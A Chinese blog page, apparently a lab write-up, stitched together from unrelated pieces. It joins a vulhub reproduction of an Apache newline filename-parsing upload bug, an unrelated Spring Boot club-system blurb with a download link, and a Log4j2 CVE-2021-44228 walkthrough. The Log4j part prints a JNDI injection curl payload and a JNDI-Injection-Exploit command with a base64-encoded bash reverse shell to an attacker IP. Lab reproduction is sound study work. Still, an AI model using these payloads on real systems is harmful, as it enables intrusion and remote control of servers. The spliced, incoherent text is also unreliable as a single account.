[vulhub]apache换⾏解析漏洞复现

漏洞环境:vulhub

burpsuite抓取,并且将1.php修改为1.php.

image-20230907172956649

.的16进制数据修改为0a

image-20230907173112070

image-20230907173137255

发送数据包

访问http://you-ip:8080/1.php%0a

资源下载链接为: https://pan.quark.cn/s/72147cbc453d 在当今信息化时代,高校社团管理的高效性与便捷性至关重要。基于 Spring Boot 开发的社团管理系统,致力于打造一个功能全面、操作便捷且安全可靠的平台,以满足高校社团的日常运营需求。本文将深入剖析该系统的架构设计、核心功能以及实现原理。 Spring Boot 以其轻量级和快速开发的特性,成为众多企业级应用的首选框架。本社团管理系统采用 Spring Boot 搭建,并遵循 RESTful API 设计原则,构建出一个松耦合、模块化的架构。借助 Spring Boot 的自动配置功能,项目初始化工作得以大幅简化,使开发者能够更加专注于业务逻辑的开发。 权限管理是系统安全的关键环节。本系统引入多级权限控制机制,确保不同角色(如管理员、普通成员等)能够访问其对应的系统功能。通常会借助 Spring Security 或 Apache Shiro 等安全框架,通过角色、权限与资源的映射关系,实现对用户操作的精细化管理。 为了提升用户体验和提高信息传递效率,系统集成了短信接口。在用户注册、密码找回、活动报名等关键操作环节,通过短信验证码进行验证。这需要与第三方短信服务提供商(如阿里云、腾讯云等)进行对接,利用其 SDK 实现短信的发送与接收功能。 会员管理:涵盖会员注册、登录、信息修改及权限分配等功能,方便社团成员进行自我管理。 活动管理:支持活动的创建、审批、报名以及评价等全流程管理,便于社团组织各类活动。 场地管理:实现场地的预定、审批和使用记录管理,确保资源的有效分配。 会议管理:提供会议安排、通知以及签到等功能,提升会议组织效率。 社团管理:包括社团的创建、修改、解散以及社团成员管理等功能。 消息通知:能够实时推送系统消息,保障信息的及时传达。 文件下发:支持文件的上传与下载,方便
### 复现Log4j2漏洞的过程 #### 漏洞概述 Apache Log4j 2.x <= 2.14.1 和 Log4j 2.15.0-rc1 版本存在严重的远程代码执行漏洞,编号为CVE-2021-44228[^2]。 #### 准备工作 为了复现漏洞,需先准备好Docker环境并安装vulhub漏洞靶场。具体操作如下: 确保已成功安装Docker容器服务[^1]。 从GitHub仓库克隆最新的vulhub项目到本地机器上: ```bash git clone https://github.com/vulhub/vulhub.git ``` 切至对应的漏洞案例文件夹内,在这里以`log4j2/CVE-2021-44228`为例: ```bash cd vulhub/log4j2/CVE-2021-44228/ ``` 按照官方说明文档中的指引来启动所需的Docker镜像和服务实例: ```bash docker-compose up -d ``` 此时应该能够正常访问部署好的Solr应用界面 `http://<靶场IP>:8983/solr/#/`。 #### 测试与验证 构建恶意请求字符串用于检测目标系统是否受到该漏洞的影响。可以借助工具如yakit自动生成有效的DNS回调地址,或者手动创建一个可控的域名供后续实验使用[^4]。 尝试向Solr管理接口发送包含特殊构造参数的动作指令,例如查看核心配置信息时附加`${jndi:ldap://${sys:java.version}.example.com}`形式的数据片段作为查询条件的一部分: ```bash curl 'http://<靶场IP>:8983/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.example.com}' ``` 如果一切顺利的话,则会在指定的日志记录位置观察到来自受控服务器发出的相关网络连接活动,证明确实触发了JNDI注入行为。 #### 攻击模拟 对于更深入的研究目的而言,还可以进一步设置监听程序等待来自受害主机发起反连Shell请求。这通常涉及到运行专门设计用来配合此类场景下的Java应用程序——比如welk1n开发维护的那个开源项目`JNDI-Injection-Exploit`[^3]。 在攻击者控制的工作站上面编译打包好上述提到的应用软件包之后,就可以依据实际情况调整命令行选项来进行定制化的载荷投递动作了。下面给出了一条可能用到的实际样例语句[^5]: ```bash java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar \ -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIzNy4xMjgvNjY2NiAwPiYx}|{base64,-d}|{bash,-i}" \ -A "<攻击机IP>" ``` 请注意替其中涉及的具体数值部分以便适应不同的测试环境需求。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值